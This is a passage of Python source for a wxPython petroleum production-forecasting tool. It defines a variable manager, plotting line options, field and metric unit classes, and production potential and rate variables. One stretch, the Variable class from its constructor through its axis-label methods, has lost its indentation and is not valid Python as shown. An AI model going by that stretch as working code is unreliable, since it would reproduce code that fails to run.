        self._water_injection_potential = WaterInjectionPotential(unit_system)
        self._total_gas_potential = TotalGasPotential(unit_system)
        # rates
        self._oil_rate = OilRate(unit_system)
        self._gas_rate = GasRate(unit_system)
        self._water_rate = WaterRate(unit_system)
        self._liquid_rate = LiquidRate(unit_system)
        self._lift_gas_rate = LiftGasRate(unit_system)
        self._gas_injection_rate = GasInjectionRate(unit_system)
        self._water_injection_rate = WaterInjectionRate(unit_system)
        self._total_gas_rate = TotalGasRate(unit_system)
        # cumulatives
        self._oil_cumulative = OilCumulative(unit_system)
        self._gas_cumulative = GasCumulative(unit_system)
        self._water_cumulative = WaterCumulative(unit_system)
        self._liquid_cumulative = LiquidCumulative(unit_system)
        self._lift_gas_cumulative = LiftGasCumulative(unit_system)
        self._gas_injection_cumulative = GasInjectionCumulative(unit_system)
        self._water_injection_cumulative = WaterInjectionCumulative(unit_system)
        self._total_gas_cumulative = TotalGasCumulative(unit_system)
        # ratios
        self._water_cut = WaterCut(unit_system)
        self._oil_cut = OilCut(unit_system)
        self._gas_oil_ratio = GasOilRatio(unit_system)
        self._water_oil_ratio = WaterOilRatio(unit_system)
        self._gas_liquid_ratio = GasLiquidRatio(unit_system)
        self._water_gas_ratio = WaterGasRatio(unit_system)
        self._oil_gas_ratio = OilGasRatio(unit_system)
        self._total_gas_liquid_ratio = TotalGasLiquidRatio(unit_system)
        self._production_uptime = ProductionUptime(unit_system)
        self._lift_gas_uptime = LiftGasUptime(unit_system)
        self._gas_injection_uptime = GasInjectionUptime(unit_system)
        self._water_injection_uptime = WaterInjectionUptime(unit_system)
        # user-defined summary variables, keyed by integer id
        self._summaries = {}
        # non-simulation dependent -------------------------------------------------------------------------------------
        # wells
        self._well_spacing = WellSpacing(unit_system)
        # reservoir fluids
        self._bo = OilFVF(unit_system)
        self._bg = GasFVF(unit_system)
        self._bw = WaterFVF(unit_system)
        self._rs = SolutionGasOilRatio(unit_system)
        # injection fluids
        self._bg_inj = InjectionGasFVF(unit_system)
        self._bw_inj = InjectionWaterFVF(unit_system)
        # facilities
        self._availability = Availability(unit_system)
        self._tglr = TargetGasLiquidRatio(unit_system)
        self._wag_cycle = WAGCycleDuration(unit_system)
        self._wag_cycles = WAGCycles(unit_system)
        self._voidage_ratio = TargetVoidageRatio(unit_system)
        # constraints
        self._oil_constraint = OilConstraint(unit_system)
        self._gas_constraint = GasConstraint(unit_system)
        self._water_constraint = WaterConstraint(unit_system)
        self._liquid_constraint = LiquidConstraint(unit_system)
        self._gas_inj_constraint = InjectionGasConstraint(unit_system)
        self._water_inj_constraint = InjectionWaterConstraint(unit_system)
        self._gas_lift_constraint = LiftGasConstraint(unit_system)
        # volumes
        self._stoiip = STOIIP(unit_system)
        # risking
        self._maturity = Maturity(unit_system)
        self._pos = ProbabilityOfSuccess(unit_system)
        # scalers
        self._s_cum = CumulativeScaler(unit_system)
        self._s_rate = RateScaler(unit_system)
        self._s_ffw = FFWScaler(unit_system)
        self._s_ffg = FFGScaler(unit_system)
        self._onset = OnsetScaler(unit_system)
        self._wct_ini = InitialWCTScaler(unit_system)
        # statics TODO: Change to a dictionary and let user fill with only useful parameters
        self._length = CompletedLength(unit_system)
        self._hcft = HydrocarbonFeet(unit_system)
        self._hcpv = HydrocarbonPoreVolume(unit_system)
        self._permeability = Permeability(unit_system)
        self._oil_density = OilDensity(unit_system)
        # correlation matrix for the scalers and static parameters -----------------------------------------------------
        self._correlation_labels = []
        self._correlation_matrix = []
        self.InitialiseCorrelationMatrix()
    def AddCorrelation(self, variable):
        """Grow the correlation matrix by one row/column (identity diagonal) for *variable*."""
        if self._correlation_matrix:
            for row in self._correlation_matrix:
                row.append(0.)
        self._correlation_matrix.append([0.] * (len(self._correlation_matrix) + 1))
        self._correlation_matrix[-1][-1] = 1.
        self._correlation_labels.append(variable.GetMenuLabel())
    def AddSummary(self, summary):
        """Assign *summary* a fresh unique id and register it."""
        id_ = self.GetUniqueSummaryId()
        summary.SetId(id_)
        self._summaries[id_] = summary
    def DeleteSummary(self, id_):
        """Remove the summary registered under *id_* (KeyError if absent)."""
        del self._summaries[id_]
    def Get(self, type_, id_=None):
        # NOTE(review): this only works for dict-valued attributes such as
        # '_summaries'; most '_<type>' attributes are variable instances,
        # not dicts -- confirm intended callers.
        if id_ is None:
            return list(getattr(self, '_{}'.format(type_)).values())
        else:
            return getattr(self, '_{}'.format(type_))[id_]
    def GetAllVariables(self):
        """All variable attributes, sorted, excluding correlation bookkeeping."""
        return GetAttributes(self, exclude=('_correlation_labels', '_correlation_matrix'), sort=True)
    def GetCorrelationMatrix(self):
        """Return (matrix, labels) for the scaler/static correlation matrix."""
        return self._correlation_matrix, self._correlation_labels
    def GetSummaries(self):
        """All user-defined summary variables (dict view)."""
        return self._summaries.values()
    def GetVariable(self, id_):
        """Resolve a variable by id: attribute '_<id_>' first, then the summaries dict."""
        attr = '_{}'.format(id_)
        if hasattr(self, attr):
            return getattr(self, attr)
        else:
            return self._summaries[id_]
    def GetVariables(self, ids):
        """Resolve several ids via GetVariable."""
        return [self.GetVariable(id_) for id_ in ids]
    def GetUniqueSummaryId(self):
        """Next free integer id for a summary (0 when none exist)."""
        ids = self._summaries.keys()
        if not ids:
            return 0
        else:
            return max(ids) + 1
    def InitialiseCorrelationMatrix(self):
        """Seed the correlation matrix with one entry per static/scaler variable."""
        attrs = GetAttributes(self, exclude=('_summaries', '_correlation_labels', '_correlation_matrix'), attr_only=True, sort=True)
        for attr in attrs:
            if attr.IsStatic() or attr.IsScaler():
                self.AddCorrelation(attr)
    def SetCorrelationMatrix(self, correlation_matrix):
        """Replace the correlation matrix (labels are left unchanged)."""
        self._correlation_matrix = correlation_matrix
# ======================================================================================================================
# Generic Variables
# ======================================================================================================================
class Variable:
def __init__(self):
self._unit = None # subclass of class Unit
self._frame_label = None # label shown on wx.Frames
self._menu_label = None # label shown in treectrls
self._image = None # PyEmbeddedImage shown in trees, etc.
self._choices = None # list of strings, which can be given as input to wx.Choice, etc.
self._choice_images = None # list of PyEmbeddedImage which can be passed to bitmapcombobox
self._client_data_map = None # dictionary of client_data for each index in bitmapcombobox
self._limits = (None, None) # limiting values for input and on plot axis'
# plot options
self._line_options = None # class of LineOptions
self._fitted_options = None # class of FittedDataOptions
self._legend = None # string, used for bar and bubble charts
# axis options (plotting)
self._plot_label = None # label shown in Matplotlib plots
self._is_date = False # required for plotting of dates
# to and from Frame options
self._round_off = None # round-off used for wx.Frame displays of variables (if pytype is float)
self._pytype = None # python-type
# tooltip
self._tooltip = None # str, tooltip to be displayed on hover
# variable management
self._type = None # str
self._id = None # str, allows access to variable_mgr via getattr(self, id_)
self._type_id = None # int, id to test against
self._image_key = None
def FromFrame(self, value):
if self._pytype is not str and value == '':
return None
elif self._pytype is bool:
return value
elif self._pytype is float:
return float(value)
elif self._pytype is int:
return int(value)
elif self._pytype is date:
return wxdate2pydate(value)
elif self._pytype is str:
return str(value)
elif (self._pytype is list) or (self._pytype is tuple):
if value == -1: # default selection in a combobox/choice
return None
else:
return value
elif self._pytype is Pointer:
return value
elif self._pytype is Index:
return value
elif self._pytype is wx.Colour:
return value
def GetAttribute(self):
return '_{}'.format(self._type)
def GetBitmap(self):
if self._image is not None:
return self._image.GetBitmap()
else:
return wx.NullBitmap
def GetImage(self):
return self._image
def GetChoices(self, idx=None):
if idx is None:
return [choice if choice is not None else '' for choice in self._choices]
else:
return self._choices[idx]
def GetChoiceBitmaps(self):
return [image.GetBitmap() if (image is not None) else wx.NullBitmap for image in self._choice_images]
def GetClientDataMap(self):
return self._client_data_map
def GetComboLabel(self):
return self._frame_label
def GetFittedOptions(self):
return self._fitted_options
def GetFrameLabel(self, idx=None):
if isinstance(self._frame_label, tuple) and idx is None:
return ('{}:'.format(l) for l in self._frame_label)
if idx is None:
if self._frame_label is None:
return None
label = self._frame_label
else:
if self._frame_label[idx] is None:
return None
label = self._frame_label[idx]
return '{}:'.format(label)
def GetId(self):
return self._id
def GetImageKey(self):
return self._image_key
def GetLabel(self):
return self._frame_label
def GetLegend(self):
return self._legend
def GetLimits(self):
return self._limits
def GetLineOptions(self):
return self._line_options
def GetMenuLabel(self):
return self._menu_label
def GetPlotLabel(self):
return self._line_options.GetLabel()
def GetToolTip(self):
return self._tooltip
def GetType(self):
return self._type
def GetTypeId(self):
return self._type_id
def GetUnit(self, idx=None):
if idx is None:
unit = self._unit
else:
unit = self._unit[idx]
if unit is None or isinstance(unit, str) or isinstance(unit, tuple):
return unit
else:
return unit.Get()
def GetUnitClass(self):
return self._unit
def GetXLabel(self):
unit = self._unit.Get()
if unit:
if ('^' in unit) or ('_' in unit):
return r'{} [${}$]'.format(self._plot_label, unit)
else:
return r'{} [{}]'.format(self._plot_label, unit)
else:
return r'{}'.format(self._plot_label)
def GetYLabel(self, group_units=False):
if group_units:
label = self._unit.GetLabel()
else:
label = self._plot_label
unit = self._unit.Get()
if ('^' in unit) or ('_' in unit):
unit_label = r'[${}$]'.format(unit)
elif unit == '':
unit_label = r'[-]'
else:
unit_label = r'[{}]'.format(unit)
return r'{} {}'.format(label, unit_label)
    def IsDate(self):
        """Return True when the variable represents calendar dates."""
        return self._is_date
    def IsScaler(self):
        """Return True for variables of type 'scalers'."""
        return self.IsType('scalers')
    def IsStatic(self):
        """Return True for variables of type 'statics'."""
        return self.IsType('statics')
    def IsSummary(self):
        """Return True for variables of type 'summaries'."""
        return self.IsType('summaries')
    def IsType(self, type_):
        """Return True when the variable's type string equals *type_*."""
        return self._type == type_
    def SetBitmap(self, bitmap):
        # NOTE(review): writes self._bitmap, which no visible accessor reads
        # (GetBitmap derives from self._image) — confirm it is used elsewhere.
        self._bitmap = bitmap
    def SetImage(self, image_key=None):
        # NOTE(review): the image_key argument is ignored here and the id is
        # used as the key; Summary.SetImage overrides this and does use the
        # argument. Looks deliberate for plain variables, but confirm.
        self._image_key = self._id
    def SetUnit(self, unit_system):
        """Unit-system change hook; no-op in the base class."""
        pass
    def SetUnitClass(self, unit_class):
        """Replace the variable's unit object."""
        self._unit = unit_class
    def ToFrame(self, value):
        """Convert a stored python *value* to the representation its frame widget expects.

        The conversion is selected by self._pytype (compared by identity):
        floats are rounded to self._round_off digits and stringified, dates
        become wx.DateTime, list/tuple and Index values map None to the
        widget's "no selection" default (-1 and 0 respectively), and
        Pointer/bool/wx.Colour values pass through unchanged.
        """
        if ((self._pytype is float) or (self._pytype is int)) and value is None:
            # unset numeric fields show an empty text control
            return ''
        elif self._pytype is bool:
            return value
        elif self._pytype is float:
            return str(round(value, self._round_off))
        elif self._pytype is int:
            return str(value)
        elif self._pytype is date:
            if value is None:  # occurs on first load
                return wx.DateTime.Now()
            else:
                return pydate2wxdate(value)
        elif self._pytype is str:
            if value is None:
                return ''
            else:
                return str(value)
        elif (self._pytype is list) or (self._pytype is tuple):
            if value is None:  # default selection in a combobox/choice
                return -1
            else:
                return value
        elif self._pytype is Pointer:
            return value
        elif self._pytype is Index:
            if value is None:  # default selection in a RadioBoxes
                return 0
            else:
                return value
        elif self._pytype is wx.Colour:
            return value
class VariableCollection:
    """Ordered collection of Variable objects with aggregate accessors."""
    def __init__(self, *variables):
        self._variables = []
        self.AddVariables(*variables)
    def AddVariable(self, variable):
        """Append a single variable."""
        self._variables.append(variable)
    def AddVariables(self, *variables):
        # one at a time, so subclass AddVariable overrides are honoured
        for var in variables:
            self.AddVariable(var)
    def GetChoiceBitmaps(self):
        """Return each variable's bitmap."""
        return [var.GetBitmap() for var in self._variables]
    def GetChoices(self):
        """Return each variable's combobox label."""
        return [var.GetComboLabel() for var in self._variables]
    def GetFrameLabel(self, idx=None):
        """Return all frame labels, or only the one at *idx*."""
        if idx is not None:
            return self._variables[idx].GetFrameLabel()
        return [var.GetFrameLabel() for var in self._variables]
    def GetUnit(self, idx=None):
        """Return all units, or only the one at *idx*."""
        if idx is not None:
            return self._variables[idx].GetUnit()
        return [var.GetUnit() for var in self._variables]
    def GetVariables(self):
        """Return the underlying list of variables."""
        return self._variables
class Summary(Variable):
    """User-defined summary variable: reduces a production profile to a scalar."""
    def __init__(self):
        super().__init__()
        self._image_key = None
        self._properties = SummaryProperty()  # similar to what Entities have
        self._type = 'summaries'
        self._type_id = ID_SUMMARY
    def Calculate(self, profile, *args):
        """Delegate the reduction of *profile* to the summary properties."""
        return self._properties.Calculate(profile, *args)
    def GetImageKey(self):
        return self._image_key
    def GetProperties(self):
        return self._properties
    def ReplaceInformation(self, variable, image):
        """Adopt unit, properties and labels from another variable."""
        self._image = image
        self._unit = variable.GetUnitClass()
        self._properties = variable.GetProperties()
        self._menu_label = self._plot_label = self._legend = variable.GetMenuLabel()
    def SetId(self, id_):
        self._id = id_
    def SetImage(self, image_key=None):
        # unlike Variable.SetImage, the key doubles as the image itself here
        self._image_key = image_key
        self._image = image_key
    def SetLabels(self, label):
        """Use *label* for menu, plot and legend alike."""
        self._menu_label = self._plot_label = self._legend = label
# ======================================================================================================================
# Types used to test against in ToFrame and FromFrame
# ======================================================================================================================
class Pointer:
    """
    Sentinel type for controls that allow insert via an arrow or other means.
    """
    def __init__(self):
        pass
class Index:
    """
    Sentinel type for transfer to and from RadioBox widgets, which use 0 as
    their default selection (unlike BitmapComboBox, which uses -1).
    """
    def __init__(self):
        pass
# ======================================================================================================================
# Plotting options for plotable variables
# ======================================================================================================================
class LineOptions:
    """
    Matplotlib line-styling options for a plotable variable.

    The Get*/Set* pairs for drawstyle and linestyle translate between the
    matplotlib string values stored here and the combobox indices used on
    the frames (-1 encodes "no selection" / None).
    """
    # index <-> matplotlib-string tables used by the frame comboboxes
    _DRAWSTYLES = ('default', 'steps-pre', 'steps-mid', 'steps-post')
    _LINESTYLES = ('-', '--', '-.', ':')
    def __init__(self, alpha=None, colour=None, drawstyle='default', fillstyle=None, label=None, linestyle='-',
                 linewidth=None, marker=None, markersize=None):
        self._alpha = alpha            # double, [0, 1]
        self._colour = colour          # (R, G, B) normalized to [0, 1]
        self._drawstyle = drawstyle    # 'default', 'steps-{pre, mid, post}'
        self._fillstyle = fillstyle    # 'full', 'none' (additional options available)
        self._label = label            # string
        self._linestyle = linestyle    # '-', '--', '-.', ':'
        self._linewidth = linewidth    # int, primarily set through settings
        self._marker = marker          # see matplotlib documentation
        self._markersize = markersize  # int, primarily set through settings
        self._picker = 7               # sensitivity to click-events
    def Get(self):
        """Return all options as a **kwargs dict for matplotlib's axes.plot."""
        return {'alpha': self._alpha,
                'color': self._colour,
                'drawstyle': self._drawstyle,
                'fillstyle': self._fillstyle,
                'label': self._label,
                'linestyle': self._linestyle,
                'linewidth': self._linewidth,
                'marker': self._marker,
                'markersize': self._markersize,
                'picker': self._picker}
    def GetAlpha(self):
        return self._alpha
    def GetColour(self):
        return self._colour
    def GetDrawstyle(self):
        """
        Used for transfer to frame.
        :return: combobox index of the drawstyle, -1 when None (unknown
                 values fall through and return None, as before)
        """
        if self._drawstyle is None:
            return -1
        if self._drawstyle in self._DRAWSTYLES:
            return self._DRAWSTYLES.index(self._drawstyle)
    def GetLabel(self):
        return self._label
    def GetLegend(self):
        """Return a detached Line2D carrying these options (legend proxy)."""
        return Line2D([], [], **self.Get())
    def GetLinestyle(self):
        """
        Used for transfer to frame.
        :return: combobox index of the linestyle, -1 when None (unknown
                 values fall through and return None, as before)
        """
        if self._linestyle is None:
            return -1
        if self._linestyle in self._LINESTYLES:
            return self._LINESTYLES.index(self._linestyle)
    def SetAlpha(self, alpha):
        self._alpha = alpha
    def SetColour(self, colour):
        self._colour = colour
    def SetDrawstyle(self, drawstyle):
        """
        Used for transfer from frame.
        :param drawstyle: int, BitmapComboBox index (-1 clears the value;
                          out-of-range indices are ignored)
        :return:
        """
        if drawstyle == -1:
            self._drawstyle = None
        elif 0 <= drawstyle < len(self._DRAWSTYLES):
            self._drawstyle = self._DRAWSTYLES[drawstyle]
    def SetFillstyle(self, fillstyle):
        self._fillstyle = fillstyle
    def SetLabel(self, label):
        self._label = label
    def SetLinestyle(self, linestyle):
        """
        Used for transfer from frame.
        :param linestyle: int, BitmapComboBox index (-1 clears the value;
                          out-of-range indices are ignored)
        :return:
        """
        if linestyle == -1:
            self._linestyle = None
        elif 0 <= linestyle < len(self._LINESTYLES):
            self._linestyle = self._LINESTYLES[linestyle]
    def SetLinewidth(self, linewidth):
        self._linewidth = linewidth
    def SetMarker(self, marker):
        self._marker = marker
    def SetMarkerSize(self, markersize):
        self._markersize = markersize
    def Highlight(self):
        """Emphasize the line: bigger markers when markers are drawn, else a
        thicker line.

        Bug fix: a markersize of None is treated as 0 instead of raising
        TypeError on the comparison. self._linewidth must then be numeric.
        """
        if (self._markersize or 0) > 0:
            self._markersize += 2
        else:
            self._linewidth += 2
    def UnHighlight(self):
        """Undo Highlight: shrink markers or thin the line by the same amount."""
        if (self._markersize or 0) > 0:
            self._markersize -= 2
        else:
            self._linewidth -= 2
class FittedDataOptions(LineOptions):
    """Line-options preset for plotting fitted data as unconnected open markers."""
    def __init__(self, colour=None):
        # marker-only style: zero linewidth, open circular markers
        super().__init__(colour=colour, label='Fitted data', fillstyle='none', linewidth=0., marker='o')
# ======================================================================================================================
# Units
# ======================================================================================================================
class Unit:
    """Base class for unit-system aware units."""
    def __init__(self, unit_system=None):
        self._label = None  # used as label in plotting when units are grouped
        self._unit = None
    def Get(self):
        """Return the unit string."""
        return self._unit
    def GetLabel(self):
        """Return the grouped-plot label."""
        return self._label
    def Set(self, unit_system):
        """Unit-system hook; base class stores nothing (sub-classes override)."""
        pass
class TimeUnit(Unit):
    """Elapsed-time unit (defaults to 'days'); independent of unit system."""
    def __init__(self, unit='days', unit_system=None):
        super().__init__()
        self._unit = unit
class DateUnit(Unit):
    """Calendar dates carry no physical unit."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = '-'
class LiquidFlowRateUnit(Unit):
    """Liquid flow rate: Mstb/day (field) or m^3/day (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Liquid Flow Rate'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'Mstb/day' if unit_system == ID_UNIT_FIELD else 'm^{3}/day'
class GasFlowRateUnit(Unit):
    """Gas flow rate: MMscf/day (field) or m^3/day (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Gas Flow Rate'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'MMscf/day' if unit_system == ID_UNIT_FIELD else 'm^{3}/day'
class LiquidVolumeUnit(Unit):
    """Liquid volume: MMstb (field) or km^3 (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Liquid Volume'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'MMstb' if unit_system == ID_UNIT_FIELD else 'km^{3}'
class GasVolumeUnit(Unit):
    """Gas volume: Bscf (field) or km^3 (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Gas Volume'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'Bscf' if unit_system == ID_UNIT_FIELD else 'km^{3}'
class GasLiquidRatioUnit(Unit):
    """Gas-liquid ratio: Mscf/stb (field) or sm^3/sm^3 (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Gas-Liquid Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'Mscf/stb' if unit_system == ID_UNIT_FIELD else 'sm^{3}/sm^{3}'
class LiquidGasRatioUnit(Unit):
    """Liquid-gas ratio: stb/Mscf (field) or sm^3/sm^3 (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Liquid-Gas Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'stb/Mscf' if unit_system == ID_UNIT_FIELD else 'sm^{3}/sm^{3}'
class LiquidLiquidRatioUnit(Unit):
    """Liquid-liquid ratio: stb/stb (field) or sm^3/sm^3 (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Liquid-Liquid Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'stb/stb' if unit_system == ID_UNIT_FIELD else 'sm^{3}/sm^{3}'
class LiquidVolumeRatio(Unit):
    """Reservoir-to-surface liquid volume ratio: rb/stb (field) or rm^3/sm^3 (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Liquid Volume Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'rb/stb' if unit_system == ID_UNIT_FIELD else 'rm^{3}/sm^{3}'
class GasVolumeRatio(Unit):
    """Reservoir-to-surface gas volume ratio: rb/Mscf (field) or rm^3/sm^3 (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Gas Volume Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'rb/Mscf' if unit_system == ID_UNIT_FIELD else 'rm^{3}/sm^{3}'
class ReservoirVolumeRatio(Unit):
    """Reservoir volume ratio: rb/rb (field) or rm^3/rm^3 (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Reservoir Volume Ratio'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'rb/rb' if unit_system == ID_UNIT_FIELD else 'rm^{3}/rm^{3}'
class LengthUnit(Unit):
    """Length: ft (field) or m (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Length'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'ft' if unit_system == ID_UNIT_FIELD else 'm'
class AreaUnit(Unit):
    """Area: ft^2 (field) or m^2 (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Area'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'ft^{2}' if unit_system == ID_UNIT_FIELD else 'm^{2}'
class VolumeUnit(Unit):
    """Volume: stb (field) or m^3 (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Volume'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = 'stb' if unit_system == ID_UNIT_FIELD else 'm^{3}'
class PermeabilityUnit(Unit):
    """Permeability in millidarcy; independent of unit system."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._label = 'Permeability'
        self._unit = 'mD'
class DensityUnit(Unit):
    """Density: degrees API (field) or kg/m^3 (metric)."""
    def __init__(self, unit_system):
        super().__init__()
        self._label = 'Density'
        self.Set(unit_system)
    def Set(self, unit_system):
        self._unit = '^{o}API' if unit_system == ID_UNIT_FIELD else 'kg/m^{3}'
class FractionUnit(Unit):
    """Dimensionless fraction, rendered as '-'."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._label = 'Fraction'
        self._unit = '-'
class PercentageUnit(Unit):
    """Percentage, rendered as '%'."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._label = 'Percentage'
        self._unit = '%'
class AmountUnit(Unit):
    """Plain count; no unit string."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._label = 'Amount'
        self._unit = ''
class Unitless(Unit):
    """Dimensionless quantity; no unit string."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._label = 'Dimensionless'
        self._unit = ''
# ======================================================================================================================
# Time Variables
# ======================================================================================================================
class DurationVariable(Variable):
    """Base class for x-axis time variables (elapsed time and dates)."""
    def __init__(self):
        super().__init__()
        self._type = 'durations'
class Time(DurationVariable):
    """Elapsed production time (TimeUnit, default days)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = TimeUnit()
        self._menu_label = 'Time'
        self._plot_label = 'Time'
        self._image = ico.time_16x16
        self._limits = (0., None)
        self._id = 'time'
class Date(DurationVariable):
    """Calendar-date axis variable (no physical unit)."""
    def __init__(self, unit_system=None):
        super().__init__()
        self._unit = DateUnit()
        self._menu_label = 'Date'
        self._plot_label = 'Dates'
        self._image = ico.dates_16x16
        self._limits = (None, None)
        self._is_date = True
        self._id = 'date'
# ======================================================================================================================
# Production Potential Variables
# ======================================================================================================================
class PotentialVariable(Variable):
    """Base class for production/injection potential variables (dashed lines)."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._type = 'potentials'
        self._type_id = ID_POTENTIAL
class OilPotential(PotentialVariable):
    """Oil production potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Oil production potential'
        self._image = ico.oil_rate_16x16
        self._line_options = LineOptions(label=r'Oil Pot.', colour=np.array([0., 176., 80.]) / 255., linestyle='--')
        self._plot_label = r'Oil Production Potential'
        self._id = 'oil_potential'
class GasPotential(PotentialVariable):
    """Gas production potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Gas production potential'
        self._image = ico.gas_rate_16x16
        self._line_options = LineOptions(label=r'Gas Pot.', colour=np.array([255., 0., 0.]) / 255., linestyle='--')
        self._plot_label = r'Gas Production Potential'
        self._id = 'gas_potential'
class WaterPotential(PotentialVariable):
    """Water production potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Water production potential'
        self._image = ico.water_rate_16x16
        self._line_options = LineOptions(label=r'Water Pot.', colour=np.array([91., 155., 213.]) / 255., linestyle='--')
        self._plot_label = r'Water Production Potential'
        self._id = 'water_potential'
class LiquidPotential(PotentialVariable):
    """Liquid (oil + water) production potential; also used for data fitting."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Liquid production potential'
        self._image = ico.liquid_rate_16x16
        self._line_options = LineOptions(label=r'Liquid Pot.', colour=np.array([51., 102., 153.]) / 255., linestyle='--')
        self._fitted_options = FittedDataOptions(colour=np.array([255., 0., 0.]) / 255.)
        self._plot_label = r'Liquid Production Potential'
        self._id = 'liquid_potential'
class LiftGasPotential(PotentialVariable):
    """Lift gas injection potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Lift gas injection potential'
        self._image = ico.lift_gas_rate_16x16
        self._line_options = LineOptions(label=r'Lift Gas Pot.', colour=np.array([219., 34., 211.]) / 255., linestyle='--')
        self._plot_label = r'Lift Gas Injection Potential'
        self._id = 'lift_gas_potential'
class GasInjectionPotential(PotentialVariable):
    """Gas injection potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Gas injection potential'
        self._image = ico.gas_injection_rate_16x16
        self._line_options = LineOptions(label=r'Gas Inj. Pot.', colour=np.array([255., 0., 0.]) / 255., linestyle='--')
        self._plot_label = r'Gas Injection Potential'
        self._id = 'gas_injection_potential'
class WaterInjectionPotential(PotentialVariable):
    """Water injection potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Water injection potential'
        self._image = ico.water_injection_rate_16x16
        self._line_options = LineOptions(label=r'Water Inj. Pot.', colour=np.array([91., 155., 213.]) / 255., linestyle='--')
        self._plot_label = r'Water Injection Potential'
        self._id = 'water_injection_potential'
class TotalGasPotential(PotentialVariable):
    """Total gas (produced + lift) production potential."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Total gas production potential'
        self._image = ico.total_gas_rate_16x16
        self._line_options = LineOptions(label=r'Total Gas Pot.', colour=np.array([218., 119., 6.]) / 255., linestyle='--')
        self._plot_label = r'Total Gas Production Potential'
        self._id = 'total_gas_potential'
# ======================================================================================================================
# Production Rate Variables
# ======================================================================================================================
class RateVariable(Variable):
    """Base class for realized production/injection rate variables (solid lines)."""
    def __init__(self):
        super().__init__()
        self._limits = (0., None)
        self._type = 'rates'
        self._type_id = ID_RATE
class OilRate(RateVariable):
    """Oil production rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Oil production rate'
        self._image = ico.oil_rate_16x16
        self._line_options = LineOptions(label=r'Oil Rate', colour=np.array([0., 176., 80.]) / 255.)
        self._plot_label = r'Oil Production Rate'
        self._id = 'oil_rate'
class GasRate(RateVariable):
    """Gas production rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Gas production rate'
        self._image = ico.gas_rate_16x16
        self._line_options = LineOptions(label=r'Gas Rate', colour=np.array([255., 0., 0.]) / 255.)
        self._plot_label = r'Gas Production Rate'
        self._id = 'gas_rate'
class WaterRate(RateVariable):
    """Water production rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Water production rate'
        self._image = ico.water_rate_16x16
        self._line_options = LineOptions(label=r'Water Rate', colour=np.array([91., 155., 213.]) / 255.)
        self._plot_label = r'Water Production Rate'
        self._id = 'water_rate'
class LiquidRate(RateVariable):
    """Liquid (oil + water) production rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = LiquidFlowRateUnit(unit_system)
        self._menu_label = 'Liquid production rate'
        self._image = ico.liquid_rate_16x16
        self._line_options = LineOptions(label=r'Liquid Rate', colour=np.array([51., 102., 153.]) / 255.)
        self._plot_label = r'Liquid Production Rate'
        self._id = 'liquid_rate'
class LiftGasRate(RateVariable):
    """Lift gas injection rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
        self._menu_label = 'Lift gas injection rate'
        self._image = ico.lift_gas_rate_16x16
        self._line_options = LineOptions(label=r'Lift Gas Rate', colour=np.array([219., 34., 211.]) / 255.)
        self._plot_label = r'Lift Gas Injection Rate'
        self._id = 'lift_gas_rate'
class GasInjectionRate(RateVariable):
    """Gas injection rate."""
    def __init__(self, unit_system):
        super().__init__()
        self._unit = GasFlowRateUnit(unit_system)
